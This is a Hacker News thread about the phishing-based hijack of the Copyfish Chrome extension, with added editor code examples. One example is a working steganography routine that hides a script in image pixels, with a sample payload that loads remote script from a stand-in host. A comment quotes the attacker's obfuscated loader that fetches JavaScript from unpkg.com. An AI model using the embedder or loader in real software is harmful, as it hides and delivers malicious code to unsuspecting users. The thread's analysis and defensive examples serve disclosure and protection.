
Our Copyfish extension was stolen and adware-infested - timr
https://a9t9.com/blog/chrome-extension-adware/
======
krackers
I guess this is as good a place as any to post that I noticed something
similar had happened to [User-Agent Switcher for Google Chrome](https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake?hl=en)
and [Block Site](https://chrome.google.com/webstore/detail/block-site/eiimnmioipafcokbfikbljfdeojpcgbh?hl=en).
The "report abuse" link on the page is useless. The former is very insidious
in that it actually hides the malware in a .jpg file that appears benign at
first (promo.jpg for anyone who wants to analyze) but when loaded in a canvas
element and decoded in some manner yields js that goes on to send all the
user's http requests to some domain while also injecting ads and redirecting
to affiliate links.
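
Editor's added example, not code from the thread and not the decoder from the extension krackers describes (which the comment does not reproduce): one common way an image can carry a script is to keep the payload in the least-significant bits of the pixel data, where it survives a trip through a canvas and is invisible to anyone who only opens the picture. In a browser the buffer below would be `ctx.getImageData(0, 0, w, h).data` after `drawImage`; here the cover image is constructed in memory so the example runs under Node. The last function is the triage check an analyst would run on a suspicious image's low bit plane.

```javascript
// Added example: LSB steganography over an RGBA pixel buffer, plus the decoder
// a malicious loader would run and a triage check an analyst would run.

// Map payload bit i to a byte in the RGBA buffer, skipping alpha (every 4th
// byte) so the image stays fully opaque and canvas premultiplication cannot
// disturb the colour channels that carry the bits.
const slot = (i) => ((i / 3) | 0) * 4 + (i % 3);
const capacityBits = (pixels) => ((pixels.length / 4) | 0) * 3;

// Layout: 4-byte big-endian length, then the payload, one bit per colour byte.
function embedPayload(pixels, payload) {
  const body = Buffer.from(payload, 'utf8');
  const header = Buffer.alloc(4);
  header.writeUInt32BE(body.length, 0);
  const data = Buffer.concat([header, body]);
  if (data.length * 8 > capacityBits(pixels)) throw new Error('cover image too small');
  const out = Uint8ClampedArray.from(pixels);
  for (let i = 0; i < data.length * 8; i++) {
    const bit = (data[i >> 3] >> (7 - (i & 7))) & 1;
    out[slot(i)] = (out[slot(i)] & 0xfe) | bit;
  }
  return out;
}

// What the loader does once the image has been drawn on a canvas.
function extractPayload(pixels) {
  const byteAt = (n) => {
    let v = 0;
    for (let b = 0; b < 8; b++) v = (v << 1) | (pixels[slot(n * 8 + b)] & 1);
    return v;
  };
  const len = ((byteAt(0) << 24) | (byteAt(1) << 16) | (byteAt(2) << 8) | byteAt(3)) >>> 0;
  if ((len + 4) * 8 > capacityBits(pixels)) throw new Error('length header does not fit the image');
  const out = Buffer.alloc(len);
  for (let i = 0; i < len; i++) out[i] = byteAt(4 + i);
  return out.toString('utf8');
}

// Analyst-side triage: does the low bit plane decode to something script-like?
// Image noise decodes to mostly non-printable bytes; an embedded script does not.
function looksLikeScript(text) {
  if (text.length === 0) return false;
  const printable = [...text].filter((c) => c >= ' ' && c <= '~').length / text.length;
  return printable > 0.95 && /\b(function|document|eval|XMLHttpRequest|fetch)\b/.test(text);
}

// Constructed 64x64 opaque cover image: deterministic pseudo-random noise.
function makeCover(w = 64, h = 64) {
  const px = new Uint8ClampedArray(w * h * 4);
  let s = 0x1234567;
  for (let i = 0; i < px.length; i++) {
    s = (Math.imul(s, 1103515245) + 12345) >>> 0;
    px[i] = (i & 3) === 3 ? 255 : (s >>> 16) & 0xff;
  }
  return px;
}

// Constructed payload in the style the comment describes (a remote script loader).
const SAMPLE_PAYLOAD =
  'var s=document.createElement("script");s.src="https://cdn.example/x.js";document.head.appendChild(s);';
```

Every carrier byte changes by at most one unit, which is why the image looks untouched; the check that catches it is decoding the low bits, not viewing the file.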

~~~
milankragujevic
I am mortified. I had this extension installed for 2 years... What info did
they get and what can they do to me? Please help... (I uninstalled it, talking
about User-Agent Switcher)

~~~
krackers
I had the same concern when I found out. I narrowed it to see that it was
probably only within the last ~5 months that it was updated to include the
badware. I don't have the skills to decode it fully (since it was obfuscated
quite heavily) but I know at the very least that it sends browsing history and
injects ads.

I'm not sure if extensions also have the capability to capture the https body
info, but I erred on the safe side and also changed passwords.

------
jeswin
Chrome's security policy is surprisingly poor and is the reason why I stay
away from most extensions. "Read data from all websites" is like root on the
phone. It should be allowed only via deliberate, explicit user action. While
this will be an interesting UX challenge, defaulting to domain-specific
permissions is the sane thing to do in this age.

Case in point, I don't care about a readability or bookmarking plugin reading
a news link, but it shouldn't read my bank page.

~~~
twhb
I think more granular permissions, not domain-specific permissions, are the
solution. Domain-specific permissions destroy the illusion that the extension
is part of the browser, without restricting access as far as it should be.

For example, I made an extension that, upon a certain keyboard shortcut, saves
the current page in a specific bookmarks folder. Currently Chrome's
permissions model completely fails here, you need to request full access to
all user data, everywhere, indefinitely.

Which would be better, (a) granting full indefinite access to the domain
you're bookmarking most of the time you bookmark something, or (b) giving the
extension permission only to see the current tab's URL and title, and to edit
one specific bookmarks folder, and only during a keyboard shortcut's callback?

The granularity solution to your scenario would be to tie page-reading
permissions to your triggering the extension, and have them removed with code
execution end. So, now you don't need to worry about sensitive information
that shows up on other domains, or your bank deciding to use a subdomain, or
that one bank blog post that you actually do want it to see.

~~~
detaro
Isn't this what the "activeTab" permission is for (combined with a shortcut to
trigger the extension's pageAction)?
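
Editor's added example, not twhb's extension and not code from the thread: the least-privilege version of "save the current tab to a folder" that detaro's question points at. The manifest asks for `activeTab` (URL and title of the focused tab, granted only for the keyboard shortcut that fired) and `bookmarks`; it never requests `tabs` or host permissions. One caveat worth stating: Chrome's `bookmarks` permission is all-or-nothing, so the folder-scoped half of twhb's proposal has no manifest equivalent. `FOLDER_ID` and the in-memory `chrome.*` stand-in are assumptions made so the logic can be exercised outside a browser.

```javascript
// Added example: manifest.json (as an object literal) and background.js for a
// bookmark-on-shortcut extension that needs no host permissions.
const MANIFEST = {
  manifest_version: 2,
  name: 'Save to folder',
  version: '1.0',
  permissions: ['activeTab', 'bookmarks'],   // no "tabs", no "<all_urls>"
  background: { scripts: ['background.js'], persistent: false },
  commands: {
    'save-to-folder': {
      suggested_key: { default: 'Ctrl+Shift+S' },
      description: 'Bookmark the current tab into the chosen folder',
    },
  },
};

// background.js. `api` is the chrome.* namespace; FOLDER_ID is a hypothetical,
// pre-created bookmark folder id. Call registerSaveCommand(chrome, FOLDER_ID).
function registerSaveCommand(api, folderId) {
  api.commands.onCommand.addListener((command) => {
    if (command !== 'save-to-folder') return;
    api.tabs.query({ active: true, currentWindow: true }, (tabs) => {
      const tab = tabs[0];
      // tab.url is populated only because the shortcut granted activeTab for this
      // tab; without the grant (or on chrome:// pages) it is undefined and we stop.
      if (!tab || !tab.url || !/^https?:/.test(tab.url)) return;
      api.bookmarks.create({ parentId: folderId, title: tab.title || tab.url, url: tab.url });
    });
  });
}

// Constructed stand-in for the chrome.* APIs so the handler runs under Node.
function makeFakeChrome(activeTab) {
  const created = [];
  let handler = null;
  return {
    created,
    fire: (cmd) => { if (handler) handler(cmd); },
    commands: { onCommand: { addListener: (fn) => { handler = fn; } } },
    tabs: { query: (q, cb) => cb(activeTab ? [activeTab] : []) },
    bookmarks: { create: (b) => { created.push(b); return b; } },
  };
}
```

Compare this with a manifest that declares `"tabs"` or `"<all_urls>"`: those grant the URL of every tab, all the time, whether or not the user pressed anything.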

------
IncRnd
> “Click here to read more details” the email said. The click opened the
> “Google” password dialog, and the unlucky team member entered the password
> for our developer account. This looked all legit to the team member, so we
> did not notice the pishing attack as such at this point. Pishing for Chrome
> extensions was simply not on our radar screen.

First, it is excellent that you disclosed the issue.

Second, based upon the quoted text you really aren't accepting responsibility
for having been phished. The team member wasn't "unlucky." Your "radar"
shouldn't trick you into thinking you won't be attacked.

~~~
Pxtl
While I normally agree, I think it's important that they referred to the
specific person without using blaming language. The team failed and screwed up
because they had bad policies with their account. The individual team member
who was holding the keys when the screw-up happened? Unlucky.

Fix the process, not the people.

It's good that they're not throwing the poor person under the bus.

~~~
hartator
I don't think more policies will make a better place. One of the team members
screwed up and stuff like this happens. I am questioning his security education
to have been phished so easily.

~~~
sillysaurus3
It's counter intuitive. I bet you $5 that if I target you, and you're not
expecting it, I can phish you. I've seen this happen in the field, and it
doesn't have much to do with education. Relax for an instant and I have you.

The only real defense is to glance at the url bar every time you're about to
enter your password. And even I find myself not doing that 100% of the time.
It's a numbers game.

A policy of popping up a popup "glance at url bar" every time you copy your
password from your password manager (which you're using, right?) would go a
long way.

~~~
hyperpape
Lastpass will tell you whether it recognizes the site when you go to fill in
the password (yes, I use it despite the scary stuff, I know I probably should
switch to OnePassword).

Do other password managers not do that?

Just curious, not trying to engage the bigger question of whether getting
phished is the user's fault.

~~~
tempay
One password has similar behaviour as well as verifying the integrity of the
browser[1]. It's not perfect, I'm sure a malicious extension would be
unimpeded, but these little features all added up and eventually made me
switch.

[1] https://support.1password.com/code-signature/

------
timdorr
Looks like they are using unpkg.com and npm to distribute the badware:

https://unpkg.com/copyfish-npm-2-8-5@1.0.1501416918/

https://www.npmjs.com/package/copyfish-npm-2-8-5

I reached out to both services to have it shut down. Hopefully that will at
least kill it temporarily.

~~~
joshschreuder
Unpkg has a blacklist, so you can put up a PR if you know the package IDs.

[https://github.com/unpkg/unpkg.com/commit/ac09a03c75a51997b9...](https://github.com/unpkg/unpkg.com/commit/ac09a03c75a51997b909a63546f9773ca9aeb837)

A similar thing happened with another Chrome extension Social Fixer about a
month ago.

EDIT: It's already been blocked, nice work @mjackson

https://github.com/unpkg/unpkg-website/commit/7d4a4ba4958c16d1b8d57876bc8931b7b8364d5e

------
joshschreuder
A similar attack happened on another Chrome extension last month (Social
Fixer) with over 190k installs.

In fact, judging by the exploit code, I would guess the same author, as the
Social Fixer attack had a very similar hashed package on Unpkg as well.

In that scenario the author also didn't have 2FA enabled:
[https://www.facebook.com/socialfixer/posts/10155117415829342](https://www.facebook.com/socialfixer/posts/10155117415829342)

I feel like Google should take the next step of requiring all extension
developers to enable 2FA before being able to post an extension.

~~~
andmalc
> Google should take the next step of requiring all extension developers to
> enable 2FA before being able to post an extension.

Best comment here

~~~
pbhjpbhj
Which would allow real world identity to be discovered, in the event of
malware is there a possibility of prosecution eg for something related to
recklessly causing damage (through inaction/action)?

------
mikegerwitz
This is why it is important to cryptographically sign releases. Browsers are a
huge problem with this.

All of the software I use is signed at some point in the chain (be it by the
actual author or by the package manager, who'd better be verifying signatures
if they're available, otherwise at least not blindly updating), _except for my
browser extensions_. Most of it is also _reproducible_! I can get around this
for some things---I use GNU Guix in addition to Debian, and they package some
extensions. I need to start using them.

Of course, the signature should really come from the actual author, not the
package maintainer for a particular distro; there's room for error. In the
case of a project being hijacked (e.g. Copyfish), hopefully a maintainer would
notice. Git commit and tag signing is an easy way to do this if you don't
separately sign releases; package maintainers should be building from source.

In the case of Copyfish: if the browser validated signatures from the authors,
then this would have been thwarted.

(Maybe there is some code signing protections in place? I'm not an extension
developer for either Chromium or Firefox; please let me know if something does
exist!)

~~~
macNchz
My understanding is that Chrome extensions are indeed signed and you can't
upload updates without signing the new package with the same key, so
presumably the attacker had access to the private key after phishing the
Google password.

Perhaps it was stored somewhere accessible by that account? Or accidentally
packaged with the extension itself? If that were the case the spear phishing
attack would make sense: someone scraping the Chrome store for extensions that
contain a key file, then phishing their developer account credentials would be
more efficient than phishing credentials without knowing beforehand whether
you'd be able to get the private key and update the extension.

[https://developer.chrome.com/extensions/packaging](https://developer.chrome.com/extensions/packaging)

~~~
mikegerwitz
Thanks.

What's concerning to me is the section entitled "Uploading a previously
packaged extension to the Chrome Web Store", which asks the user to place the
private key into the package's root and include it in a zip. First: why? Why
upload the private key? That leaks it to Google and on top of that stores it
in multiple places; the user could forget to delete the zip (and do so
securely), for example. And the private key in the root is probably a copy, so
that has to be shredded too.

For updating the package, you select the project root as well. If you didn't
remove your private key before doing so, I'm assuming you'd be releasing your
key?

------
flyGuyOnTheSly
This is the second extension that I use on chrome that has been hijacked.

The first was live http headers [0]

I have never had this experience on Firefox.

Is it simply a matter of Chrome being a bigger target?

[0]
[https://www.webmasterworld.com/webmaster/4829365.htm](https://www.webmasterworld.com/webmaster/4829365.htm)

~~~
Buge
The Great Suspender Chrome extension was also phished

[https://github.com/deanoemcke/thegreatsuspender/issues/512](https://github.com/deanoemcke/thegreatsuspender/issues/512)

~~~
zootam
but apparently non-maliciously

~~~
Buge
What do you mean?

I thought the attacker stole the account maliciously, but hadn't quite gotten
around to inserting the malware by the time it was taken back.

~~~
flyGuyOnTheSly
The live http headers hacking was quite embarrassing for myself personally.

I had strong suspicions that a certain webhost a new client of mine utilized
was both prone to attack, and not very forthcoming when past attacks had
occurred.

So when I loaded their own website one day and found it full of ads for
Russian pornography... I confirmed my own bias that the webhost had been
hacked... deleted the account, and moved everything over to AWS.

Changed all the passwords, freaked out a bit, etc...

Then I realized that it was just the extension I was running that injected
those ads... d'oh!

------
userbinator
The somewhat obfuscated JS downloaded from unpkg.com has what appears to be a
Google Analytics ID in it: UA-103045553-1. I'm not sure if that can help trace
the origin.

------
busterarm
It's a bad weekend for Chrome Extensions, it seems.

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Tomer-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-WP.pdf

------
ivanbakel
Good reminder that you should never be in the mindset of "expecting" a phish
from any source - trust is how they get you. Also, if a message was really
urgent, you wouldn't have to click-through to see it.

~~~
sillysaurus3
I think I'm misreading your comment, but the best defense against phishing is
to always be expecting a phishing attack from every source. Every time you're
about to paste your password, glance at the url bar.

~~~
laurencei
> Every time you're about to paste your password, glance at the url bar.

Actually - I disagree with this. You can no longer "glance" at the url bar to
determine if you are on the right domain due to Unicode chars if you clicked a
link.

The only safe way is to type the url yourself into the browser.

If it is a long link - then at least typing the base domain, and pasting the
"rest" is _probably_ safe?

~~~
sillysaurus3
This actually isn't true. A website like https://www.xn--80ak6aa92e.com/ won't
show up as apple.com. Browsers don't allow Unicode rendering in the URL bar.

Maybe IE is affected though. I haven't tested every browser. But it's a known
security concern.

~~~
fnj
Sorry to tell you, _does_ show up as apple.com in my browser. Chrome
52.0.2743.82-1 on Arch x86_64.

~~~
arthurfm
The IDN vulnerability was fixed by Google in Chrome 58.

https://arstechnica.co.uk/information-technology/2017/04/chrome-firefox-and-opera-unicode-phishing/
https://bugs.chromium.org/p/chromium/issues/detail?id=683314

Why have you got such an old version of Chrome?

~~~
fnj
Thank you. That gives me a strong reason to update.

To answer your question, (1) it's pretty arduous to install Chrome from the
AUR, and (2) I am wary of Google removing useful functionality from Chrome.

------
gargravarr
Spear phishing is remarkably effective, even against tech-savvy people. One of
the most alarming aspects is that we've become trained to click links in
emails as soon as we see some trustworthy indication, be it something we were
expecting, a spoofed sender or copying Google's layout, further reinforced by
an accurate login page clone.

I think the best defence here is to condition ourselves out of this behaviour.
If you receive a link in an email, don't click it - view the source or paste
it into a text document and examine it. And if you aren't expecting an email,
such as Google emailing out of the blue, go to the known-trusted site and see
if there's any pending notifications.

Seems we need to stop trusting email.

------
bjornstar
I've gotten this phishing e-mail 3 times over the past month or so. The first
time I almost fell for it.

Looking at the attacker's code, they are currently trying to steal cloudflare
api keys in addition to stealing cookies from all sites the extension users
visit :(

------
staticautomatic
Of course it's a phishing attack. Why would Google send you a bit.ly link to
your own Google account?

~~~
alecthomas
"Note that the bitly link was not directly visible in the phishing email, as
it was an HTML-email. That is another lesson learned: Back to standard, text-
based email as the default."
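
Editor's added example, not code from the thread: the "examine the link, not the rendered mail" step that gargravarr and the quoted lesson above describe, as a script you can paste an HTML body into. It pulls every anchor out, resolves the real destination, and flags the patterns that gave this mail away: a URL shortener as the target, a destination off the claimed sender's domain, punycode in the host, and visible link text that names one host while `href` goes to another. The sample mail is constructed and the bit.ly path is a placeholder, not the one from the attack.

```javascript
// Added example: audit the links in an HTML mail before anyone clicks them.
const SHORTENERS = new Set(['bit.ly', 'goo.gl', 't.co', 'tinyurl.com', 'ow.ly', 'is.gd']);

function sameSite(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// If the visible link text itself looks like a URL or hostname, return that host.
function hostFromText(text) {
  const m = /(?:https?:\/\/)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)/i.exec(text);
  return m ? m[1].toLowerCase() : null;
}

// senderDomain: the domain the mail claims to come from (e.g. "google.com").
function auditEmailLinks(html, senderDomain) {
  const findings = [];
  const anchor = /<a\b[^>]*?\bhref\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = anchor.exec(html)) !== null) {
    const href = m[1];
    const text = m[2].replace(/<[^>]+>/g, '').trim();
    const reasons = [];
    let host = null;
    try { host = new URL(href).hostname; } catch (e) { reasons.push('href is not a parseable URL'); }
    if (host) {
      if (SHORTENERS.has(host)) reasons.push('shortener hides the real destination');
      if (host.split('.').some((l) => l.startsWith('xn--'))) reasons.push('punycode hostname');
      if (!sameSite(host, senderDomain)) reasons.push('points off the sender domain (' + host + ')');
      const textHost = hostFromText(text);
      if (textHost && textHost !== host) reasons.push('text shows ' + textHost + ' but href goes to ' + host);
    }
    if (reasons.length) findings.push({ href, text, reasons });
  }
  return findings;
}

// Constructed sample in the shape of the mail the blog post describes.
const SAMPLE_MAIL = `
<p>Your item is at risk of removal from the store.</p>
<p><a href="https://bit.ly/placeholder-path">Click here to read more details</a></p>
<p>Sign in at <a href="https://chrome-google.example/verify">https://chrome.google.com/webstore</a></p>
<p>Manage settings: <a href="https://accounts.google.com/ServiceLogin">accounts.google.com</a></p>`;
```

A shortener in a mail that claims to be from the service itself is a finding on its own: the service owns its domain and has no reason to hide the destination.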

~~~
BenjiWiebe
I always look at the mouse over url. And check the URL in the address bar. And
rely on the password manager in the browser. And sometimes login in a new tab,
then go back and reload the link.

~~~
4ad
A pity some browsers now hide the mouse over URL.

I use this in safari to bring it back: https://visnup.github.io/Minimal-Status-Bar/

~~~
Rjevski
In Safari you can go to "View -> Show status bar" to bring it back natively
without a third-party extension.

~~~
4ad
Amazing, thanks!

------
tedunangst
Something to be said about auto updating software...

------
sgroppino
I'd have thought that two-factor authentication could have prevented this type
of attack?

~~~
giovannibajo1
Only with U2F, because the hardware dongle would refuse to provide the OTP to
a different domain

~~~
devrandomguy
Yeah, we really need to distinguish between a 2FA app and a dedicated hardware
key. My phone is probably the least secure thing I've ever owned, both in
terms of technical security, and physical security.

This whole 2FA thing has been really jarring for me, because I always treated
my phone like a public space: no password, no private data (that I know of),
ready for inspection by foreign authorities. Of all the things the world could
ask me to trust, why the phone?

~~~
TeMPOraL
> _Of all the things the world could ask me to trust, why the phone?_

Because it's the only instance of a computer that you can expect the majority
of users to own and always have on them.

2FA as a thing would not get any reasonable adoption if you required people to
buy hardware keys to use it. Not to mention, hardware keys do not work on
every device one would like to log in from (AFAIK you can't plug in a Yubikey
to an Android tablet, and it may not have NFC built in).

~~~
mschuster91
> AFAIK you can't plug in a Yubikey to an Android tablet, and it may not have
> NFC built in

Using a USB OTG adapter, it should be possible. However, even the flagship
tablets of Samsung don't carry NFC, only the phones do - and even there it's a
hit and miss if you have NFC.

Apple, on the other hand, doesn't have developer-accessible NFC _anywhere_.

This is a real shame.

------
shawn-butler
>> We are trying to contact Google, but so far, have been unable to reach any
human being that can help.

So typical, unfortunately.

------
Cthulhu_
No 2FA? No additional password / 2FA challenge when a big, dangerous operation
like moving an extension to another account is triggered?

------
logicallee
We should never have to read a title "disable immediately" by a developer. In
a news article. That is not how this should be distributed, in case the
original developer is the one distributing the news.

Instead, Google should generate an emergency disable code that a developer can
put into a simple web form from anywhere in the world, even if the developer
has been locked out of every one of their accounts, which immediately
centrally disables that extension.

How it should work.

Parts.

1. "revocation code generation" and explanation. Text like: "this is a secret
revocation code. Anyone who learns it can immediately disable your extension.
Keep it secure and separate from all of your production systems. You will be
able to use it even if locked out of all other access."

2. A web form people can submit revocation codes to, from anywhere with
Internet access.

The code should be very high-entropy and generated by Google. However, it
should not have ambiguous characters like 1 and capital I.

I personally would generate it using a dicewords-like wordlist. Also, I
personally would ensure it had approximately 384 bits of total entropy of
which one third is a recovery checksum. This enables the developer to write
many words down wrong and still be able to disable their extension. In case
the recovery record/checksum portion were used, I would offer the user the
result "You appeared to have made a mistake which we could correct. Is this
the correct disable key?" then show the corrected version.

However, this last idea seems to be beyond the state of cryptography worldwide
(i.e. for some reason I have written something that exceeds best practices
worldwide, like I'm from the future or something), so I understand if Google's
cryptographers don't implement this part.

The above seems a bit grandiose of me so here is the comment where I first
wrote about this:

[https://news.ycombinator.com/item?id=14571414](https://news.ycombinator.com/item?id=14571414)

~~~
Animats
_We should never have to read a title "disable immediately" by a developer. In
a news article._

If you want to change that, start contacting reporters from mainstream media.
If this hits the New York Times or the Wall Street Journal, or at least
Techdirt, Google might notice.

~~~
logicallee
Google is staffed by geniuses who also read HN and I feel it is sufficient
that I suggested one possible correct solution here on HN. I am sure they'll
introduce some solution to this problems. (I mean some way for them to disable
compromised extensions centrally.)

I am not personally an extension developer and don't run many.

~~~
likpok
The people you need to convince are Google management, so that they prioritize
this over everything else on the roadmap. One easy way to do that from outside
is to make it actually a priority, by making it a PR issue. Otherwise it turns
into one of those perennial 'things we want to do' that never beats out the
critical items on the roadmap.

~~~
logicallee
can you give a source for this insight? tell me more.

It does explain so much. For example, all this work was put into a ridiculous,
animated, moving, flashing new gmail sign-in page that was pre-announced for
weeks (our sign-in page is changing!) and after all that work does not include
even seven and a half minutes worth of improvement by a developer. For
example, I had to laugh and laugh after I realized it wasn't accepting my
password because my caps lock was on.

I would expect a popup warning if you have your caps lock turned on while
typing. Because, you know, that is one of literally like 3 things you can do
to improve a sign-in page that is that dynamic and moving and flashing.
There's just not much to improve.

All that flash and it doesn't _do_ anything at all. Your comment gives a lot
of insight as to why so I would like to understand this cultural shift.

How does management work at Google now?

------
thadk
FYI, This "Better History" extension in Chrome has a history of selling
browser history since it was sold by its developer:
https://chrome.google.com/webstore/detail/better-history/obciceimmggglbmelaidpjlmodcebijb?hl=en

They frequently remove it from the store when people notice and restore it a
month or so later.

The comments over the past year or so detail the symptoms of spyware. The
"Report Abuse" button in Chrome Store feels useless.

------
tarosnow
You can use the Chrome Apps & Extensions Developer Tools[1] to monitor the
activity of your apps and extensions.

[1]: https://chrome.google.com/webstore/detail/chrome-apps-extensions-de/ohmmkhmmmpcnpikjeljgnaoabkaalbgc

------
cgb223
Can someone explain to me why the attacker wrote the script source tag as

    var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';

Instead of just:

    var config_fragment = '<script src="https://unpkg.com/' + hash + '/' + hour + '.js"></script>';

~~~
anonred
It’s usually done to prevent the parser from interpreting the closing script
tag early: https://stackoverflow.com/questions/236073/why-split-the-script-tag-when-writing-it-with-document-write

~~~
limeblack
If this is truly the reason the coder went overboard in parsing it up IMO.
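
Editor's added example, not code from the thread: a small de-obfuscator that folds the `'<sc' + 'ript'` style concatenation back into plain strings, run over the line quoted above (`hash` and `hour` are the attacker's variables and stay symbolic). It makes the two points in this sub-thread concrete. The HTML tokenizer ends an inline script at a literal `</script` followed by whitespace, `/` or `>`, so that is the only split the parser ever needs; every other split in the sample exists to keep `https://unpkg.com/` out of reach of a grep, a store-review heuristic, or an analyst's eye, and folding restores it.

```javascript
// Added example: fold adjacent string literals and grep the result.

// The line quoted in the thread, as constructed sample input.
const SAMPLE =
  `var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';`;

// Two adjacent literals with the same quote character joined by '+'. Escapes
// inside the literals are preserved; literals separated by a variable are not
// merged because the expression between them is not a literal.
const PAIR = /(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\+\s*\1((?:\\.|(?!\1)[^\\])*)\1/;

function foldStringConcat(src) {
  let prev;
  do {
    prev = src;
    src = src.replace(PAIR, (m, q, a, b) => q + a + b + q);
  } while (src !== prev);
  return src;
}

// What a naive scanner looks for. On the obfuscated form it finds nothing.
function findUrls(src) {
  return src.match(/https?:\/\/[^\s'"<>]+/g) || [];
}

// The one split the HTML parser actually cares about.
function containsInlineScriptTerminator(src) {
  return /<\/script[\s/>]/i.test(src);
}
```

Note that the folded output still reads `</sc ript>` (with the space), so after folding the sample does not even contain the sequence that would have needed splitting.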

------
sunnyps
Please use Google's "Password Alert" Chrome extension to protect your Google
account. It will notify you if you accidentally enter your Google password on
another website.

------
jwilk
> Back to standard, text-based email as the default.

Yeah, but what will you do when you receive an HTML-only mail, or a mail with
text/plain alternative saying "lol, get a better MUA", or a mail with
text/plain alternative so mangled it can't be read without making your brain
hurt?

All these are common occurrences in automatically sent e-mails these days.

~~~
jstanley
View the HTML mail, but with fancy rendering, images, all remote content, etc.
disabled.

Thunderbird does this by default.

~~~
jwilk
> View the HTML mail

And that's exactly what phishers want you to do.

------
yrro
Debian patched the Chromium browser to refuse to install or update add-ons
from the Chrome store. At first I found this annoying, but I am coming around
to their way of thinking--that ultimately I can only trust software in the
Debian archive.

------
Endy
While I understand how some people can take this as a cautionary tale in favor
of 2FA, as someone who doesn't like it and won't use it, I guess my mindset is
very simple. There's the old saw that over time, computing has evolved from
smart people in front of dumb terminals into dumb people in front of "smart"
terminals. This attack is proof of it; and while 2FA might have had an impact,
the major issue here is that we had a dumb person - this "unlucky" team member
- who either didn't have the training or the common sense to understand that
if you have a public presence on the Internet, you are a target. If you have
auto-updating software installed on more than 1 machine, you are going to be
someone's target because they want access to that person's computer.

The lesson here is: never trust anyone or anything.

~~~
driverdan
> The lesson here is: never trust anyone or anything.

Which is why you should use 2FA and why you shouldn't trust someone who says
they don't use it.

~~~
Endy
I don't trust any of the 2FA providers. And I have neither the time nor the
interest to try and learn to code it in binary.

~~~
cyphar
TOTP is a specification and there are many free software implementations. U2F
is also a specification (but generally they aren't free software
implementations).

~~~
Endy
Again - I don't trust the people who created the specifications; and I don't
trust either the free implementors or the non-free ones, though my inclination
would be to go with non-free if I were forced. As it is, I simply don't use
services that rely on them.

------
interfixus
tl;dr: A member of the development team thought it unexceptional and credible
that Google should be using a clickable bit.ly url in an unsolicited email
asking for login and update.

The world is an uphill kind of place.

------
_Codemonkeyism
"This looked all legit to the team member" sure the team member checked the
URL of the password screen? Yes, and Google using Freshdesk.

------
Rainymood
(In the article "phishing" is consistently misspelled as "pishing".)

~~~
IncRnd
Perhaps the author of the page really isn't the author of Copyfish, and they
phished us all with a page about getting phished.

------
sneak
TLDR: Use FIDO hardware 2FA. The tokens are $15. No excuses.

------
nvr219
Always do a 2fa

